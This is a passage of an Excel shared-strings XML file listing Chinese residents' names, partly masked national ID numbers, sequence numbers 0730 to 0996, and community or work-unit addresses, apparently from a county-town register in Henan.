    <t>刘闯</t>
  </si>
  <si>
    <t>411326********0030</t>
  </si>
  <si>
    <t>0730</t>
  </si>
  <si>
    <t>毛德安</t>
  </si>
  <si>
    <t>412921********881X</t>
  </si>
  <si>
    <t>0731</t>
  </si>
  <si>
    <t>城关镇南外村</t>
  </si>
  <si>
    <t>王琳琳</t>
  </si>
  <si>
    <t>4113210104</t>
  </si>
  <si>
    <t>0732</t>
  </si>
  <si>
    <t>张敏</t>
  </si>
  <si>
    <t>0733</t>
  </si>
  <si>
    <t>中华社区四组</t>
  </si>
  <si>
    <t>刘国印</t>
  </si>
  <si>
    <t>0734</t>
  </si>
  <si>
    <t>杨家萍</t>
  </si>
  <si>
    <t>0735</t>
  </si>
  <si>
    <t>中华社区九组</t>
  </si>
  <si>
    <t>刘保安</t>
  </si>
  <si>
    <t>412921********1556</t>
  </si>
  <si>
    <t>0736</t>
  </si>
  <si>
    <t>张玉存</t>
  </si>
  <si>
    <t>412921********168X</t>
  </si>
  <si>
    <t>0737</t>
  </si>
  <si>
    <t>西北社区二组</t>
  </si>
  <si>
    <t>郭延龙</t>
  </si>
  <si>
    <t>0738</t>
  </si>
  <si>
    <t>西北社区四组</t>
  </si>
  <si>
    <t>栗勇</t>
  </si>
  <si>
    <t>0739</t>
  </si>
  <si>
    <t>栗明</t>
  </si>
  <si>
    <t>411326********0054</t>
  </si>
  <si>
    <t>0740</t>
  </si>
  <si>
    <t>席清栓</t>
  </si>
  <si>
    <t>0741</t>
  </si>
  <si>
    <t>李兴玉</t>
  </si>
  <si>
    <t>411326********0036</t>
  </si>
  <si>
    <t>0742</t>
  </si>
  <si>
    <t>东北社区六组</t>
  </si>
  <si>
    <t>李民</t>
  </si>
  <si>
    <t>412921********0092</t>
  </si>
  <si>
    <t>0743</t>
  </si>
  <si>
    <t>东北社区一组</t>
  </si>
  <si>
    <t>孙欣鑫</t>
  </si>
  <si>
    <t>411326********0050</t>
  </si>
  <si>
    <t>0744</t>
  </si>
  <si>
    <t>李河</t>
  </si>
  <si>
    <t>0745</t>
  </si>
  <si>
    <t>宋宽龙</t>
  </si>
  <si>
    <t>412921********0455</t>
  </si>
  <si>
    <t>0746</t>
  </si>
  <si>
    <t>赵倩</t>
  </si>
  <si>
    <t>410103********0187</t>
  </si>
  <si>
    <t>0747</t>
  </si>
  <si>
    <t>北外六组</t>
  </si>
  <si>
    <t>李连英</t>
  </si>
  <si>
    <t>0748</t>
  </si>
  <si>
    <t>城关镇中华社区</t>
  </si>
  <si>
    <t>杨明芝</t>
  </si>
  <si>
    <t>0749</t>
  </si>
  <si>
    <t>赵峰</t>
  </si>
  <si>
    <t>0750</t>
  </si>
  <si>
    <t>汪秀英</t>
  </si>
  <si>
    <t>0751</t>
  </si>
  <si>
    <t>北外五组</t>
  </si>
  <si>
    <t>李凤</t>
  </si>
  <si>
    <t>0752</t>
  </si>
  <si>
    <t>城关镇东北社区</t>
  </si>
  <si>
    <t>吴一帆</t>
  </si>
  <si>
    <t>0753</t>
  </si>
  <si>
    <t>中华社区</t>
  </si>
  <si>
    <t>王六青</t>
  </si>
  <si>
    <t>0754</t>
  </si>
  <si>
    <t>东北社区</t>
  </si>
  <si>
    <t>马青框</t>
  </si>
  <si>
    <t>0755</t>
  </si>
  <si>
    <t>李同义</t>
  </si>
  <si>
    <t>0756</t>
  </si>
  <si>
    <t>北外社区</t>
  </si>
  <si>
    <t>李树新</t>
  </si>
  <si>
    <t>0757</t>
  </si>
  <si>
    <t>杨雯</t>
  </si>
  <si>
    <t>0758</t>
  </si>
  <si>
    <t>郭林军</t>
  </si>
  <si>
    <t>0759</t>
  </si>
  <si>
    <t>张高申</t>
  </si>
  <si>
    <t>0760</t>
  </si>
  <si>
    <t>闫学营</t>
  </si>
  <si>
    <t>411326********0047</t>
  </si>
  <si>
    <t>0761</t>
  </si>
  <si>
    <t>西北社区</t>
  </si>
  <si>
    <t>聂新强</t>
  </si>
  <si>
    <t>412921********5511</t>
  </si>
  <si>
    <t>0762</t>
  </si>
  <si>
    <t>聂湫林</t>
  </si>
  <si>
    <t>411321********0278</t>
  </si>
  <si>
    <t>0763</t>
  </si>
  <si>
    <t>朱三燕</t>
  </si>
  <si>
    <t>0764</t>
  </si>
  <si>
    <t>张立</t>
  </si>
  <si>
    <t>0765</t>
  </si>
  <si>
    <t>随献奎</t>
  </si>
  <si>
    <t>0766</t>
  </si>
  <si>
    <t>代杰</t>
  </si>
  <si>
    <t>0767</t>
  </si>
  <si>
    <t>郭洺珲</t>
  </si>
  <si>
    <t>411321********0036</t>
  </si>
  <si>
    <t>0768</t>
  </si>
  <si>
    <t>任明凤</t>
  </si>
  <si>
    <t>412921********0467</t>
  </si>
  <si>
    <t>0769</t>
  </si>
  <si>
    <t>崔书亮</t>
  </si>
  <si>
    <t>0770</t>
  </si>
  <si>
    <t>宋学敏</t>
  </si>
  <si>
    <t>0771</t>
  </si>
  <si>
    <t>李仁常</t>
  </si>
  <si>
    <t>0772</t>
  </si>
  <si>
    <t>程建生</t>
  </si>
  <si>
    <t>0773</t>
  </si>
  <si>
    <t>城关镇电业局</t>
  </si>
  <si>
    <t>史鸿臻</t>
  </si>
  <si>
    <t>411326********0014</t>
  </si>
  <si>
    <t>0774</t>
  </si>
  <si>
    <t>吴明倡</t>
  </si>
  <si>
    <t>411326********0112</t>
  </si>
  <si>
    <t>0775</t>
  </si>
  <si>
    <t>张庆洋</t>
  </si>
  <si>
    <t>0776</t>
  </si>
  <si>
    <t>李万春</t>
  </si>
  <si>
    <t>0777</t>
  </si>
  <si>
    <t>王爱珍</t>
  </si>
  <si>
    <t>0778</t>
  </si>
  <si>
    <t>城关镇西北社区</t>
  </si>
  <si>
    <t>熊秀奇</t>
  </si>
  <si>
    <t>0779</t>
  </si>
  <si>
    <t>王玉甫</t>
  </si>
  <si>
    <t>0780</t>
  </si>
  <si>
    <t>城关镇北外社区</t>
  </si>
  <si>
    <t>武威</t>
  </si>
  <si>
    <t>0781</t>
  </si>
  <si>
    <t>翟玉凤</t>
  </si>
  <si>
    <t>412921********0189</t>
  </si>
  <si>
    <t>0782</t>
  </si>
  <si>
    <t>张建军</t>
  </si>
  <si>
    <t>0783</t>
  </si>
  <si>
    <t>李植鑫</t>
  </si>
  <si>
    <t>410325********0392</t>
  </si>
  <si>
    <t>0784</t>
  </si>
  <si>
    <t>席国梅</t>
  </si>
  <si>
    <t>0785</t>
  </si>
  <si>
    <t>方元媛</t>
  </si>
  <si>
    <t>411321********3428</t>
  </si>
  <si>
    <t>0786</t>
  </si>
  <si>
    <t>方梓豪</t>
  </si>
  <si>
    <t>411321********0118</t>
  </si>
  <si>
    <t>0787</t>
  </si>
  <si>
    <t>林广云</t>
  </si>
  <si>
    <t>0788</t>
  </si>
  <si>
    <t>任行玉</t>
  </si>
  <si>
    <t>0789</t>
  </si>
  <si>
    <t>杨兴珍</t>
  </si>
  <si>
    <t>0790</t>
  </si>
  <si>
    <t>东北社区
外贸局</t>
  </si>
  <si>
    <t>徐召伟</t>
  </si>
  <si>
    <t>0791</t>
  </si>
  <si>
    <t>东北社区
黄金局</t>
  </si>
  <si>
    <t>李同生</t>
  </si>
  <si>
    <t>0792</t>
  </si>
  <si>
    <t>东北社区蚕业局</t>
  </si>
  <si>
    <t>张文钦</t>
  </si>
  <si>
    <t>0793</t>
  </si>
  <si>
    <t>南外社区中医院</t>
  </si>
  <si>
    <t>李长兴</t>
  </si>
  <si>
    <t>0794</t>
  </si>
  <si>
    <t>杨振华</t>
  </si>
  <si>
    <t>0795</t>
  </si>
  <si>
    <t>南外社区印刷厂</t>
  </si>
  <si>
    <t>华蕊</t>
  </si>
  <si>
    <t>0796</t>
  </si>
  <si>
    <t>张园园</t>
  </si>
  <si>
    <t>411326********5121</t>
  </si>
  <si>
    <t>0797</t>
  </si>
  <si>
    <t>张恩华</t>
  </si>
  <si>
    <t>411321********0075</t>
  </si>
  <si>
    <t>0798</t>
  </si>
  <si>
    <t>赵闯</t>
  </si>
  <si>
    <t>412921********4016</t>
  </si>
  <si>
    <t>0799</t>
  </si>
  <si>
    <t>徐成峰</t>
  </si>
  <si>
    <t>412921********404X</t>
  </si>
  <si>
    <t>0800</t>
  </si>
  <si>
    <t>王涛</t>
  </si>
  <si>
    <t>412921********2856</t>
  </si>
  <si>
    <t>0801</t>
  </si>
  <si>
    <t>南外社区教育局</t>
  </si>
  <si>
    <t>吕云朋</t>
  </si>
  <si>
    <t>0802</t>
  </si>
  <si>
    <t>李红伟</t>
  </si>
  <si>
    <t>412921********1135</t>
  </si>
  <si>
    <t>0803</t>
  </si>
  <si>
    <t>南外社区文化局</t>
  </si>
  <si>
    <t>王冬梅</t>
  </si>
  <si>
    <t>0804</t>
  </si>
  <si>
    <t>西北社区商业中心</t>
  </si>
  <si>
    <t>陈贞均</t>
  </si>
  <si>
    <t>412921********4434</t>
  </si>
  <si>
    <t>0805</t>
  </si>
  <si>
    <t>张文宇</t>
  </si>
  <si>
    <t>0806</t>
  </si>
  <si>
    <t>西北社区工信局</t>
  </si>
  <si>
    <t>贺小华</t>
  </si>
  <si>
    <t>0807</t>
  </si>
  <si>
    <t>西北社区卫生局</t>
  </si>
  <si>
    <t>王聚荣</t>
  </si>
  <si>
    <t>0808</t>
  </si>
  <si>
    <t>魏清军</t>
  </si>
  <si>
    <t>412921********0114</t>
  </si>
  <si>
    <t>0809</t>
  </si>
  <si>
    <t>韩峰</t>
  </si>
  <si>
    <t>0810</t>
  </si>
  <si>
    <t>闫涛</t>
  </si>
  <si>
    <t>0811</t>
  </si>
  <si>
    <t>西北社区教育局</t>
  </si>
  <si>
    <t>郭心盈</t>
  </si>
  <si>
    <t>0812</t>
  </si>
  <si>
    <t>李梦博</t>
  </si>
  <si>
    <t>411321********0199</t>
  </si>
  <si>
    <t>0813</t>
  </si>
  <si>
    <t>刘岩</t>
  </si>
  <si>
    <t>0814</t>
  </si>
  <si>
    <t>宋苑苑</t>
  </si>
  <si>
    <t>411326********0065</t>
  </si>
  <si>
    <t>0815</t>
  </si>
  <si>
    <t>王世献</t>
  </si>
  <si>
    <t>412921********2019</t>
  </si>
  <si>
    <t>0816</t>
  </si>
  <si>
    <t>黄彪</t>
  </si>
  <si>
    <t>0817</t>
  </si>
  <si>
    <t>董可九</t>
  </si>
  <si>
    <t>0818</t>
  </si>
  <si>
    <t>西北社区县社</t>
  </si>
  <si>
    <t>任柯</t>
  </si>
  <si>
    <t>0819</t>
  </si>
  <si>
    <t>李兴平</t>
  </si>
  <si>
    <t>0820</t>
  </si>
  <si>
    <t>李硕</t>
  </si>
  <si>
    <t>0821</t>
  </si>
  <si>
    <t>郭庆敏</t>
  </si>
  <si>
    <t>0822</t>
  </si>
  <si>
    <t>靳立军</t>
  </si>
  <si>
    <t>412921********4411</t>
  </si>
  <si>
    <t>0823</t>
  </si>
  <si>
    <t>张万丽</t>
  </si>
  <si>
    <t>412921********4426</t>
  </si>
  <si>
    <t>0824</t>
  </si>
  <si>
    <t>田万刚</t>
  </si>
  <si>
    <t>412921********3812</t>
  </si>
  <si>
    <t>0825</t>
  </si>
  <si>
    <t>张瑞霞</t>
  </si>
  <si>
    <t>0826</t>
  </si>
  <si>
    <t>张刚</t>
  </si>
  <si>
    <t>0827</t>
  </si>
  <si>
    <t>刘小刚</t>
  </si>
  <si>
    <t>0828</t>
  </si>
  <si>
    <t>杜建东</t>
  </si>
  <si>
    <t>412921********1871</t>
  </si>
  <si>
    <t>0829</t>
  </si>
  <si>
    <t>鲁德锋</t>
  </si>
  <si>
    <t>412921********245X</t>
  </si>
  <si>
    <t>0830</t>
  </si>
  <si>
    <t>董兆斌</t>
  </si>
  <si>
    <t>412921********4496</t>
  </si>
  <si>
    <t>0831</t>
  </si>
  <si>
    <t>段彬</t>
  </si>
  <si>
    <t>412921********4447</t>
  </si>
  <si>
    <t>0832</t>
  </si>
  <si>
    <t>袁金圃</t>
  </si>
  <si>
    <t>0833</t>
  </si>
  <si>
    <t>李瑞</t>
  </si>
  <si>
    <t>412921********5006</t>
  </si>
  <si>
    <t>0834</t>
  </si>
  <si>
    <t>徐英</t>
  </si>
  <si>
    <t>412921********0422</t>
  </si>
  <si>
    <t>0835</t>
  </si>
  <si>
    <t>段兴珍</t>
  </si>
  <si>
    <t>412921********042X</t>
  </si>
  <si>
    <t>0836</t>
  </si>
  <si>
    <t>乔道峰</t>
  </si>
  <si>
    <t>412921********0050</t>
  </si>
  <si>
    <t>0837</t>
  </si>
  <si>
    <t>西北社区粮食局</t>
  </si>
  <si>
    <t>姜德高</t>
  </si>
  <si>
    <t>412921********1631</t>
  </si>
  <si>
    <t>0838</t>
  </si>
  <si>
    <t>于献波</t>
  </si>
  <si>
    <t>0839</t>
  </si>
  <si>
    <t>曾峰</t>
  </si>
  <si>
    <t>412921********1635</t>
  </si>
  <si>
    <t>0840</t>
  </si>
  <si>
    <t>杨金生</t>
  </si>
  <si>
    <t>0841</t>
  </si>
  <si>
    <t>杨惠雯</t>
  </si>
  <si>
    <t>411321********6281</t>
  </si>
  <si>
    <t>0842</t>
  </si>
  <si>
    <t>杨智斌</t>
  </si>
  <si>
    <t>411321********0154</t>
  </si>
  <si>
    <t>0843</t>
  </si>
  <si>
    <t>翟新兰</t>
  </si>
  <si>
    <t>0844</t>
  </si>
  <si>
    <t>张一倩</t>
  </si>
  <si>
    <t>411321********0029</t>
  </si>
  <si>
    <t>0845</t>
  </si>
  <si>
    <t>张同国</t>
  </si>
  <si>
    <t>0846</t>
  </si>
  <si>
    <t>张红敏</t>
  </si>
  <si>
    <t>0847</t>
  </si>
  <si>
    <t>刘泓远</t>
  </si>
  <si>
    <t>411321********0055</t>
  </si>
  <si>
    <t>0848</t>
  </si>
  <si>
    <t>王延东</t>
  </si>
  <si>
    <t>0849</t>
  </si>
  <si>
    <t>黄强</t>
  </si>
  <si>
    <t>412921********0096</t>
  </si>
  <si>
    <t>0850</t>
  </si>
  <si>
    <t>石军贵</t>
  </si>
  <si>
    <t>0851</t>
  </si>
  <si>
    <t>西北社区文化局</t>
  </si>
  <si>
    <t>张小山</t>
  </si>
  <si>
    <t>0852</t>
  </si>
  <si>
    <t>张小平</t>
  </si>
  <si>
    <t>0853</t>
  </si>
  <si>
    <t>张国东</t>
  </si>
  <si>
    <t>0854</t>
  </si>
  <si>
    <t>李培支</t>
  </si>
  <si>
    <t>0855</t>
  </si>
  <si>
    <t>索国明</t>
  </si>
  <si>
    <t>0856</t>
  </si>
  <si>
    <t>余海洋</t>
  </si>
  <si>
    <t>0857</t>
  </si>
  <si>
    <t>中华社区物资局</t>
  </si>
  <si>
    <t>卢中敏</t>
  </si>
  <si>
    <t>412921********4841</t>
  </si>
  <si>
    <t>0858</t>
  </si>
  <si>
    <t>中华社区就业办</t>
  </si>
  <si>
    <t>张浩</t>
  </si>
  <si>
    <t>0859</t>
  </si>
  <si>
    <t>张鲁豫</t>
  </si>
  <si>
    <t>0860</t>
  </si>
  <si>
    <t>中华社区工信局</t>
  </si>
  <si>
    <t>张居青</t>
  </si>
  <si>
    <t>0861</t>
  </si>
  <si>
    <t>中华社区缫丝厂</t>
  </si>
  <si>
    <t>赵国欣</t>
  </si>
  <si>
    <t>0862</t>
  </si>
  <si>
    <t>刘宏春</t>
  </si>
  <si>
    <t>412921********1119</t>
  </si>
  <si>
    <t>0863</t>
  </si>
  <si>
    <t>贾青有</t>
  </si>
  <si>
    <t>0864</t>
  </si>
  <si>
    <t>贺保丽</t>
  </si>
  <si>
    <t>0865</t>
  </si>
  <si>
    <t>中华社区民政局</t>
  </si>
  <si>
    <t>张文强</t>
  </si>
  <si>
    <t>0866</t>
  </si>
  <si>
    <t>詹秀辉</t>
  </si>
  <si>
    <t>0867</t>
  </si>
  <si>
    <t>常津</t>
  </si>
  <si>
    <t>411321********5176</t>
  </si>
  <si>
    <t>0868</t>
  </si>
  <si>
    <t>中华社区乡镇局</t>
  </si>
  <si>
    <t>潘姣霞</t>
  </si>
  <si>
    <t>0869</t>
  </si>
  <si>
    <t>中华社区粮食局</t>
  </si>
  <si>
    <t>王铁生</t>
  </si>
  <si>
    <t>0870</t>
  </si>
  <si>
    <t>栗红</t>
  </si>
  <si>
    <t>0871</t>
  </si>
  <si>
    <t>祖少卿</t>
  </si>
  <si>
    <t>412921********0155</t>
  </si>
  <si>
    <t>0872</t>
  </si>
  <si>
    <t>中华社区商业中心</t>
  </si>
  <si>
    <t>岳建</t>
  </si>
  <si>
    <t>412921********0151</t>
  </si>
  <si>
    <t>0873</t>
  </si>
  <si>
    <t>张小虎</t>
  </si>
  <si>
    <t>0874</t>
  </si>
  <si>
    <t>孙玉良</t>
  </si>
  <si>
    <t>0875</t>
  </si>
  <si>
    <t>闫荣华</t>
  </si>
  <si>
    <t>0876</t>
  </si>
  <si>
    <t>关红军</t>
  </si>
  <si>
    <t>412921********0098</t>
  </si>
  <si>
    <t>0877</t>
  </si>
  <si>
    <t>余运富</t>
  </si>
  <si>
    <t>0878</t>
  </si>
  <si>
    <t>朱德敏</t>
  </si>
  <si>
    <t>0879</t>
  </si>
  <si>
    <t>中华社区外贸局</t>
  </si>
  <si>
    <t>张军平</t>
  </si>
  <si>
    <t>0880</t>
  </si>
  <si>
    <t>闫荣均</t>
  </si>
  <si>
    <t>0881</t>
  </si>
  <si>
    <t>李朝阳</t>
  </si>
  <si>
    <t>0882</t>
  </si>
  <si>
    <t>徐桂萍</t>
  </si>
  <si>
    <t>0883</t>
  </si>
  <si>
    <t>赵刚</t>
  </si>
  <si>
    <t>0884</t>
  </si>
  <si>
    <t>张重一</t>
  </si>
  <si>
    <t>411326********005X</t>
  </si>
  <si>
    <t>0885</t>
  </si>
  <si>
    <t>张俊然</t>
  </si>
  <si>
    <t>411321********0021</t>
  </si>
  <si>
    <t>0886</t>
  </si>
  <si>
    <t>张俊涵</t>
  </si>
  <si>
    <t>411321********0107</t>
  </si>
  <si>
    <t>0887</t>
  </si>
  <si>
    <t>马新斐</t>
  </si>
  <si>
    <t>411321********006X</t>
  </si>
  <si>
    <t>0888</t>
  </si>
  <si>
    <t>李栋</t>
  </si>
  <si>
    <t>0889</t>
  </si>
  <si>
    <t>张天亮</t>
  </si>
  <si>
    <t>412921********0171</t>
  </si>
  <si>
    <t>0890</t>
  </si>
  <si>
    <t>田万红</t>
  </si>
  <si>
    <t>412921********3648</t>
  </si>
  <si>
    <t>0891</t>
  </si>
  <si>
    <t>张天景</t>
  </si>
  <si>
    <t>0892</t>
  </si>
  <si>
    <t>高丽</t>
  </si>
  <si>
    <t>0893</t>
  </si>
  <si>
    <t>孙俊宝</t>
  </si>
  <si>
    <t>0894</t>
  </si>
  <si>
    <t>0895</t>
  </si>
  <si>
    <t>中华社区农机局</t>
  </si>
  <si>
    <t>宋长栓</t>
  </si>
  <si>
    <t>0896</t>
  </si>
  <si>
    <t>中华社区林业局</t>
  </si>
  <si>
    <t>王云霏</t>
  </si>
  <si>
    <t>411321********0746</t>
  </si>
  <si>
    <t>0897</t>
  </si>
  <si>
    <t>张德成</t>
  </si>
  <si>
    <t>0898</t>
  </si>
  <si>
    <t>李金春</t>
  </si>
  <si>
    <t>0899</t>
  </si>
  <si>
    <t>李金华</t>
  </si>
  <si>
    <t>412921********1622</t>
  </si>
  <si>
    <t>0900</t>
  </si>
  <si>
    <t>杨新生</t>
  </si>
  <si>
    <t>412921********1573</t>
  </si>
  <si>
    <t>0901</t>
  </si>
  <si>
    <t>杨韵彰</t>
  </si>
  <si>
    <t>411321********0476</t>
  </si>
  <si>
    <t>0902</t>
  </si>
  <si>
    <t>樊建峰</t>
  </si>
  <si>
    <t>412921********155X</t>
  </si>
  <si>
    <t>0903</t>
  </si>
  <si>
    <t>王文召</t>
  </si>
  <si>
    <t>0904</t>
  </si>
  <si>
    <t>王灿</t>
  </si>
  <si>
    <t>0905</t>
  </si>
  <si>
    <t>王成丽</t>
  </si>
  <si>
    <t>0906</t>
  </si>
  <si>
    <t>胡延红</t>
  </si>
  <si>
    <t>0907</t>
  </si>
  <si>
    <t>和召阳</t>
  </si>
  <si>
    <t>0908</t>
  </si>
  <si>
    <t>和煜铭</t>
  </si>
  <si>
    <t>411321********3055</t>
  </si>
  <si>
    <t>0909</t>
  </si>
  <si>
    <t>中华社区电线厂</t>
  </si>
  <si>
    <t>黄书全</t>
  </si>
  <si>
    <t>0910</t>
  </si>
  <si>
    <t>高营</t>
  </si>
  <si>
    <t>0911</t>
  </si>
  <si>
    <t>中华社区交通局</t>
  </si>
  <si>
    <t>彭春英</t>
  </si>
  <si>
    <t>0912</t>
  </si>
  <si>
    <t>杜培军</t>
  </si>
  <si>
    <t>0913</t>
  </si>
  <si>
    <t>隋闯奎</t>
  </si>
  <si>
    <t>0914</t>
  </si>
  <si>
    <t>王九瑞</t>
  </si>
  <si>
    <t>412921********3466</t>
  </si>
  <si>
    <t>0915</t>
  </si>
  <si>
    <t>尹延武</t>
  </si>
  <si>
    <t>0916</t>
  </si>
  <si>
    <t>濮延慧</t>
  </si>
  <si>
    <t>0917</t>
  </si>
  <si>
    <t>陆万芝</t>
  </si>
  <si>
    <t>0918</t>
  </si>
  <si>
    <t>程远生</t>
  </si>
  <si>
    <t>0919</t>
  </si>
  <si>
    <t>毛金兰</t>
  </si>
  <si>
    <t>0920</t>
  </si>
  <si>
    <t>杨金娜</t>
  </si>
  <si>
    <t>0921</t>
  </si>
  <si>
    <t>林书战</t>
  </si>
  <si>
    <t>0922</t>
  </si>
  <si>
    <t>杨大军</t>
  </si>
  <si>
    <t>0923</t>
  </si>
  <si>
    <t>尹芳春</t>
  </si>
  <si>
    <t>412921********6002</t>
  </si>
  <si>
    <t>0924</t>
  </si>
  <si>
    <t>王俊杰</t>
  </si>
  <si>
    <t>412921********4422</t>
  </si>
  <si>
    <t>0925</t>
  </si>
  <si>
    <t>蔡沅卓</t>
  </si>
  <si>
    <t>0926</t>
  </si>
  <si>
    <t>郭兰</t>
  </si>
  <si>
    <t>412921********0729</t>
  </si>
  <si>
    <t>0927</t>
  </si>
  <si>
    <t>张清彦</t>
  </si>
  <si>
    <t>412921********101X</t>
  </si>
  <si>
    <t>0928</t>
  </si>
  <si>
    <t>孙小平</t>
  </si>
  <si>
    <t>0929</t>
  </si>
  <si>
    <t>王林普</t>
  </si>
  <si>
    <t>411326********4014</t>
  </si>
  <si>
    <t>0930</t>
  </si>
  <si>
    <t>余金春</t>
  </si>
  <si>
    <t>0931</t>
  </si>
  <si>
    <t>孙献伟</t>
  </si>
  <si>
    <t>0932</t>
  </si>
  <si>
    <t>张金枝</t>
  </si>
  <si>
    <t>0933</t>
  </si>
  <si>
    <t>李道林</t>
  </si>
  <si>
    <t>412921********1198</t>
  </si>
  <si>
    <t>0934</t>
  </si>
  <si>
    <t>刘旗</t>
  </si>
  <si>
    <t>0935</t>
  </si>
  <si>
    <t>王素云</t>
  </si>
  <si>
    <t>412921********1566</t>
  </si>
  <si>
    <t>0936</t>
  </si>
  <si>
    <t>李春芳</t>
  </si>
  <si>
    <t>0937</t>
  </si>
  <si>
    <t>潘长松</t>
  </si>
  <si>
    <t>412921********3651</t>
  </si>
  <si>
    <t>0938</t>
  </si>
  <si>
    <t>戴东</t>
  </si>
  <si>
    <t>0939</t>
  </si>
  <si>
    <t>中华社区蚕业局</t>
  </si>
  <si>
    <t>张金桥</t>
  </si>
  <si>
    <t>412921********3314</t>
  </si>
  <si>
    <t>0940</t>
  </si>
  <si>
    <t>中华社区饮食服务公司</t>
  </si>
  <si>
    <t>张聚奇</t>
  </si>
  <si>
    <t>0941</t>
  </si>
  <si>
    <t>晋军</t>
  </si>
  <si>
    <t>0942</t>
  </si>
  <si>
    <t>中华社区巢丝厂</t>
  </si>
  <si>
    <t>朱舜禹</t>
  </si>
  <si>
    <t>0943</t>
  </si>
  <si>
    <t>黄珍</t>
  </si>
  <si>
    <t>412921********013X</t>
  </si>
  <si>
    <t>0944</t>
  </si>
  <si>
    <t>黄梦钰</t>
  </si>
  <si>
    <t>411321********5966</t>
  </si>
  <si>
    <t>0945</t>
  </si>
  <si>
    <t>宋明莘</t>
  </si>
  <si>
    <t>411321********035X</t>
  </si>
  <si>
    <t>0946</t>
  </si>
  <si>
    <t>宋明扬</t>
  </si>
  <si>
    <t>411321********0190</t>
  </si>
  <si>
    <t>0947</t>
  </si>
  <si>
    <t>李想</t>
  </si>
  <si>
    <t>0948</t>
  </si>
  <si>
    <t>梁浩楠</t>
  </si>
  <si>
    <t>411321********0034</t>
  </si>
  <si>
    <t>0949</t>
  </si>
  <si>
    <t>中华社区木材公司</t>
  </si>
  <si>
    <t>王春秀</t>
  </si>
  <si>
    <t>0950</t>
  </si>
  <si>
    <t>李世召</t>
  </si>
  <si>
    <t>0951</t>
  </si>
  <si>
    <t>王劲松</t>
  </si>
  <si>
    <t>0952</t>
  </si>
  <si>
    <t>王康桥</t>
  </si>
  <si>
    <t>0953</t>
  </si>
  <si>
    <t>陈秀芝</t>
  </si>
  <si>
    <t>0954</t>
  </si>
  <si>
    <t>赵旌博</t>
  </si>
  <si>
    <t>0955</t>
  </si>
  <si>
    <t>胡文克</t>
  </si>
  <si>
    <t>411326********5155</t>
  </si>
  <si>
    <t>0956</t>
  </si>
  <si>
    <t>胡靖雨</t>
  </si>
  <si>
    <t>411321********2892</t>
  </si>
  <si>
    <t>0957</t>
  </si>
  <si>
    <t>李胜文</t>
  </si>
  <si>
    <t>412921********153X</t>
  </si>
  <si>
    <t>0958</t>
  </si>
  <si>
    <t>田广珍</t>
  </si>
  <si>
    <t>412921********164X</t>
  </si>
  <si>
    <t>0959</t>
  </si>
  <si>
    <t>张会远</t>
  </si>
  <si>
    <t>0960</t>
  </si>
  <si>
    <t>薛健</t>
  </si>
  <si>
    <t>0961</t>
  </si>
  <si>
    <t>王建军</t>
  </si>
  <si>
    <t>0962</t>
  </si>
  <si>
    <t>刘军</t>
  </si>
  <si>
    <t>0963</t>
  </si>
  <si>
    <t>闫长荣</t>
  </si>
  <si>
    <t>412921********1529</t>
  </si>
  <si>
    <t>0964</t>
  </si>
  <si>
    <t>王茂晓</t>
  </si>
  <si>
    <t>411321********0212</t>
  </si>
  <si>
    <t>0965</t>
  </si>
  <si>
    <t>赵华</t>
  </si>
  <si>
    <t>412921********1586</t>
  </si>
  <si>
    <t>0966</t>
  </si>
  <si>
    <t>王景峰</t>
  </si>
  <si>
    <t>412921********5916</t>
  </si>
  <si>
    <t>0967</t>
  </si>
  <si>
    <t>孙伟</t>
  </si>
  <si>
    <t>0968</t>
  </si>
  <si>
    <t>民主社区石油公司</t>
  </si>
  <si>
    <t>王岩</t>
  </si>
  <si>
    <t>411326********004X</t>
  </si>
  <si>
    <t>4113210105</t>
  </si>
  <si>
    <t>0969</t>
  </si>
  <si>
    <t>民主社区工信局</t>
  </si>
  <si>
    <t>王长华</t>
  </si>
  <si>
    <t>0970</t>
  </si>
  <si>
    <t>田光连</t>
  </si>
  <si>
    <t>0971</t>
  </si>
  <si>
    <t>郭树峰</t>
  </si>
  <si>
    <t>0972</t>
  </si>
  <si>
    <t>蔡庆炜</t>
  </si>
  <si>
    <t>0973</t>
  </si>
  <si>
    <t>张建凤</t>
  </si>
  <si>
    <t>0974</t>
  </si>
  <si>
    <t>彭建华</t>
  </si>
  <si>
    <t>0975</t>
  </si>
  <si>
    <t>王东升</t>
  </si>
  <si>
    <t>0976</t>
  </si>
  <si>
    <t>张新恒</t>
  </si>
  <si>
    <t>412921********441X</t>
  </si>
  <si>
    <t>0977</t>
  </si>
  <si>
    <t>张茗豪</t>
  </si>
  <si>
    <t>411321********0710</t>
  </si>
  <si>
    <t>0978</t>
  </si>
  <si>
    <t>民主社区粮食局</t>
  </si>
  <si>
    <t>张春克</t>
  </si>
  <si>
    <t>412921********5877</t>
  </si>
  <si>
    <t>0979</t>
  </si>
  <si>
    <t>吴海静</t>
  </si>
  <si>
    <t>412921********4501</t>
  </si>
  <si>
    <t>0980</t>
  </si>
  <si>
    <t>0981</t>
  </si>
  <si>
    <t>民主社区县社</t>
  </si>
  <si>
    <t>郭淼</t>
  </si>
  <si>
    <t>0982</t>
  </si>
  <si>
    <t>谷奇恩</t>
  </si>
  <si>
    <t>0983</t>
  </si>
  <si>
    <t>潘雲</t>
  </si>
  <si>
    <t>0984</t>
  </si>
  <si>
    <t>蔡磊</t>
  </si>
  <si>
    <t>0985</t>
  </si>
  <si>
    <t>杜明强</t>
  </si>
  <si>
    <t>412921********3697</t>
  </si>
  <si>
    <t>0986</t>
  </si>
  <si>
    <t>李玉国</t>
  </si>
  <si>
    <t>0987</t>
  </si>
  <si>
    <t>周河歧</t>
  </si>
  <si>
    <t>0988</t>
  </si>
  <si>
    <t>张庆雨</t>
  </si>
  <si>
    <t>412921********3611</t>
  </si>
  <si>
    <t>0989</t>
  </si>
  <si>
    <t>北外社区教育局</t>
  </si>
  <si>
    <t>杨洪昌</t>
  </si>
  <si>
    <t>412921********3614</t>
  </si>
  <si>
    <t>0990</t>
  </si>
  <si>
    <t>北外社区工信局</t>
  </si>
  <si>
    <t>林太明</t>
  </si>
  <si>
    <t>0991</t>
  </si>
  <si>
    <t>张荣珍</t>
  </si>
  <si>
    <t>412921********5823</t>
  </si>
  <si>
    <t>0992</t>
  </si>
  <si>
    <t>北外社区粮食局</t>
  </si>
  <si>
    <t>王山平</t>
  </si>
  <si>
    <t>0993</t>
  </si>
  <si>
    <t>北外社区县社</t>
  </si>
  <si>
    <t>孙书超</t>
  </si>
  <si>
    <t>0994</t>
  </si>
  <si>
    <t>412921********481X</t>
  </si>
  <si>
    <t>0995</t>
  </si>
  <si>
    <t>王晓峰</t>
  </si>
  <si>
    <t>0996</t>
  </si>
  <si>
